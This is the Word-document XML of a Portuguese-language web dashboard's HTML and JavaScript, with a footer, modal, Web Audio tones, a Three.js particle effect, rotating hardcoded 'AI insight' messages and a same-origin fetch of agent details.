    <w:p w14:paraId="4FD086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0DD47D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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD6BE19" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68478C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&lt;!-- Footer --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE575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&lt;footer class="text-center" style="color: var(--text-secondary);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCECF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class="card-3d"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EAA4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class="flex flex-col md:flex-row justify-between items-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AF0C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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E831A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&lt;strong&gt;ALSHAM GLOBAL COMMERCE&lt;/strong&gt; - Arquétipo Supremo Dashboard v2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669CA7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22CADF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class="mt-2 md:mt-0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF404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Última atualização: &lt;span id="last-update"&gt;--:--:--&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6090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02A5F6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33DFEB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class="mt-4 text-sm"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305707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Mago Visionário • Transcendência Tecnológica • Contador Real de Ciclos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C470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2C192C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5CBEF2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&lt;/footer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2476D7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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E346390" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ADC97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&lt;!-- Agent Modal --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9EA4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&lt;div id="agent-modal" class="modal"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502268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&lt;div class="modal-content"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530878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class="flex justify-between items-center mb-6"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FF58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&lt;h2 id="modal-title" class="text-2xl font-bold"&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE23F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&lt;button onclick="closeModal()" class="text-2xl" style="color: var(--text-secondary);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA8C5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&lt;i class="fas fa-times"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBC8E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&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB85E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4B1F6D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&lt;div id="modal-body"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB54C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&lt;!-- Modal content will be populated here --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395337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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488987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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1107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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B56BAAA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3943CB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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F4DC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DADOS REAIS DA API =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BB50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const API_BASE_URL = window.location.origin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01081A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let realTimeData = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE67749" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7AE7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SOUND DESIGN SYSTEM =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38116B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class SoundDesign {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4549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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A93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this.audioContext = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7BC0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this.sounds = {};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228671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this.enabled = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABB43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this.initAudio();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0E40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6D94F5E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C6A0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async initAudio() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741719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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352EB9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this.audioContext = new (window.AudioContext || window.webkitAudioContext)();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C924C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this.createSounds();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739E7B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catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FFBD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console.log('Audio não disponível:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1ECE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this.enabled = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F46C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16F548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ADD94FF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A9E7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createSounds() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E233D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Create synthetic sounds using Web Audio API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ED82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this.sounds = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC351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hover: () =&gt; this.createTone(800, 0.1, 0.05),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220B17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click: () =&gt; this.createTone(1200, 0.1, 0.1),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA3C1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cycle: () =&gt; this.createTone(600, 0.2, 0.15),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B391E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success: () =&gt; this.createTone(1000, 0.3, 0.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29603A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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA0D8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496BCF2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75DB41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createTone(frequency, duration, volume) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777028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(!this.enabled || !this.audioContext) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF5D2A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C65E7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oscillator = this.audioContext.createOscillator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6F12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gainNode = this.audioContext.createGain();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C178D1F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E8DD8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oscillator.connect(gainNode);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ADB7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gainNode.connect(this.audioContext.destination);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6ABE63" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53168B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oscillator.frequency.setValueAtTime(frequency, this.audioContext.currentTime);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8BA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oscillator.type = 'sine';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55596FB8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="631FC5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gainNode.gain.setValueAtTime(0, this.audioContext.currentTime);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E6C4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gainNode.gain.linearRampToValueAtTime(volume, this.audioContext.currentTime + 0.01);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340519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gainNode.gain.exponentialRampToValueAtTime(0.001, this.audioContext.currentTime + duration);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BDD1A2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071FFC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oscillator.start(this.audioContext.currentTime);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71390DC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oscillator.stop(this.audioContext.currentTime + duration);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D3BC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9E8EAFE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378BD7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play(soundName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADD29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(this.sounds[soundName]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618E6C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this.sounds[soundName]();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE4F8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E2A11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EF37E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E44BCFC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E12F6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PARTICLES SYSTEM =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D15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class ParticlesSystem {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578819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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3D96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this.scene = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C655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this.camera = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CDCF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this.renderer = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DACBE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this.particles = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471B1D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this.mouse = { x: 0, y: 0 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764D7B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this.init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158FF2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E55E173" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FB6DC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init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352D98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Create scene</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313BEC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this.scene = new THREE.Scene();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F932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this.camera = new THREE.PerspectiveCamera(75, window.innerWidth / window.innerHeight, 0.1, 1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D205A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this.renderer = new THREE.WebGLRenderer({ alpha: true });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D34B0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5958CD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this.renderer.setSize(window.innerWidth, window.innerHeight);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED459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this.renderer.setClearColor(0x000000, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737855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6A7D05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document.getElementById('particles-container').appendChild(this.renderer.domElement);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593B8182" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE437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Create particles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00449D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this.createParticles();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636016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784F3D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Position camera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13088A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this.camera.position.z = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A757AC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33DB32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Bind events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3ADF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this.bindEvents();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9AAA66" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7487D5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Start animation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0F11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this.animate();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F294C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E6B31A3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="715C27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createParticles() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776B4C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particleCount = 100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A73E1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geometry = new THREE.SphereGeometry(0.02, 8, 8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A91EE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4B8454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for (let i = 0; i &lt; particleCount; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB4D8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material = new THREE.MeshBasicMaterial({ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF270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color: getComputedStyle(document.body).getPropertyValue('--particles-color') || '#F4D03F',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D4F8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transparent: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B10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opacity: 0.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8DE6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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DF8F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5B8361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particle = new THREE.Mesh(geometry, material);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4E83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110EF7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particle.position.x = (Math.random() - 0.5) * 20;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06364E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particle.position.y = (Math.random() - 0.5) * 20;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8008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particle.position.z = (Math.random() - 0.5) * 20;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB03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1B293B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particle.userData = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D0D9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originalPosition: particle.position.clone(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4229C3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velocity: new THREE.Vector3(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57420D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(Math.random() - 0.5) * 0.02,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFD07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(Math.random() - 0.5) * 0.02,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55249C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(Math.random() - 0.5) * 0.02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78886F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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251EAC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24DAF3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7EC7E4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this.particles.push(particle);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A62F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this.scene.add(particle);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638059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4E0269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D94B918" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8DB6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animate() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A970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requestAnimationFrame(() =&gt; this.animate());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F48A6F5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4139D2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Update particles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624F6B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this.particles.forEach(particle =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD626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Move particles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018BF4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particle.position.add(particle.userData.velocity);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71322C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2CE306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Mouse interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C763D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distance = particle.position.distanceTo(new THREE.Vector3(this.mouse.x * 5, -this.mouse.y * 5, 0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2401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(distance &lt; 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2366A6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particle.position.lerp(particle.userData.originalPosition, 0.02);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3411A5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240623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1A7E22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Reset particles that go too far</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EBF7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(Math.abs(particle.position.x) &gt; 10 || </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8D5E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Math.abs(particle.position.y) &gt; 10 || </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5072A3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Math.abs(particle.position.z) &gt; 10) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590458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particle.position.copy(particle.userData.originalPosition);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D382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4B309798" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223473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// Rotate particles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51406B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particle.rotation.x += 0.01;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F76E0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particle.rotation.y += 0.01;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E80A8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28D7B7E1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B607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this.renderer.render(this.scene, this.camera);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404FA3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A52644B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55DE6D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bindEvents() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510C99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window.addEventListener('mousemove', (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5D0A3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this.mouse.x = (event.clientX / window.innerWidth) * 2 - 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5CF8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this.mouse.y = -(event.clientY / window.innerHeight) * 2 + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B64C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34A92ECB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5974EB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window.addEventListener('resize', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7574B7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this.camera.aspect = window.innerWidth / window.innerHeight;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A611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this.camera.updateProjectionMatrix();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F559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this.renderer.setSize(window.innerWidth, window.innerHeight);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69787F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4EB050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D009860" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE286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updateTheme() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4AC3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newColor = getComputedStyle(document.body).getPropertyValue('--particles-color') || '#F4D03F';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523FE9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this.particles.forEach(particle =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD2A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particle.material.color.setStyle(newColor);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235E97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7EF8B4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63DD1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C8E92FA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A93C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AI INSIGHTS SYSTEM =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7BAB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class AIInsights {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726CFA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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E306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this.insights = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758303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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Performance otimizada em 12% nos últimos ciclos",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1B76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Pico de atividade detectado no Core Agent",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA00B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🔮</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Padrão emergente: Melhoria exponencial identificada",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEE35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Sistema operando em zona de transcendência",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797668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✨</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sinergia entre agentes em estado ideal",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E94C1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Eficiência energética maximizada",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE2AA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💎</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Qualidade dos dados excedendo expectativas",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A855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"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🌟</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evolução do sistema acima da curva prevista"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E7A3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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6D8B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this.currentIndex = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B96A2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this.startRotation();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDDFF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B8D08CE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C97A4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startRotation() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5082F8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setInterval(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B81DE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this.updateInsight();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504440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}, 5000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656BA1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6D1709C4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27DE90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updateInsight() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20567D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element = document.getElementById('ai-insight');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312BF9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(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F180B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element.style.opacity = '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587DC0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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3EC1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element.textContent = this.insights[this.currentIndex];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61892D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element.style.opacity = '1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669667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this.currentIndex = (this.currentIndex + 1) % this.insights.length;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3311FD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 200);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5438EC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6CE3D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110ED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1170A638" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A57A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FUNÇÃO PARA BUSCAR DADOS REAIS DOS AGENTES =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5397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async function fetchRealAgentData(agentName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE8DE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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B820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console.log(`</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Buscando dados reais para ${agentName}...`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BA70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response = await fetch(`${API_BASE_URL}/api/agent/${agentName}/details`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66710C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1A0444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(response.ok) {</w:t>
      </w:r>
    </w:p>
